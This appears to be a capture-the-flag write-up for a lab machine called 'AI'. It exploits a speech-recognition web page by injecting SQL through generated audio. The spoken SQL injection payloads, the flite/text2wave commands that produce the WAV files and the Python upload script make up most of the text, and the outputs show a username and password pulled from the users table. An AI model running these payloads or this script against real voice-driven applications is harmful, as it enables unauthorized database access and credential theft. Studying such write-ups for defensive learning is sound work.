AI

ai

Sample PHP Pseudo Code #

$voice = new play('file.wav');
$result = $voice->recognise("Good Morning");
if ($result) { 
  echo "Matched Good Morning"; 
  //flag to database or csv
 } else { 
  echo "No match found";
 }

Attacks #

Tools #

# Generates WAV file from Male US voice
flite -voice rms "hello world" a.wav
echo "Hello open single quote" | text2wave -o ai.wav

Voice to SQL #

Speech to SQL Queries and Payloads #

# I didn't see any speech to text command for "select" in
# microsoft website but this works in this form.
# Result:
#  <h3>Our understanding of your input is : 'union select 1 -- -<br />Query result : 1<h3>
./sqli.py "open single quote union select 1 comment database"

# Here, "select" and "password" was combined to "selectpassword"
# Result: H,Sq9t6}a<)?q93_
./sqli.py "open single quote union selectpassword from users comment database"

# Adding "space" to get username
# Result: <h3>Our understanding of your input is : 'union select   username from users -- -<br />Query result : alexa<h3>
./sqli.py "open single quote union select space username from users comment database"
' union select password from users#

Python script to automate upload of WAV File #

#!/usr/bin/env python3

import requests
import os
import sys
import re

proxies = {'http': 'http://127.0.0.1:8080'}
url = 'http://ai/ai.php'
wav_filename = 'voice.wav'
voice_filename = 'voice.txt'

try:
  query = sys.argv[1]
except IndexError:
  print('Example Usage: ./sqli.py "Comment database"')
  sys.exit(0)

def generate_wav(query):
  with open(voice_filename, 'w') as f:
    f.write(query)
  os.system('flite -voice rms {} {}'.format(voice_filename, wav_filename))

def send_file():
  data = {'wav_filename': wav_filename, 'name': 'Submit'}
  files = {
    'fileToUpload': (wav_filename, open(wav_filename, 'rb')),
    'submit': (None, 'Process It!')
    }
  r = requests.post(url, files=files, proxies=proxies)
  sql_response = re.findall('<h3>Our understanding.+<h3>', r.text)[0]
  print(sql_response)

generate_wav(query)
send_file()

References #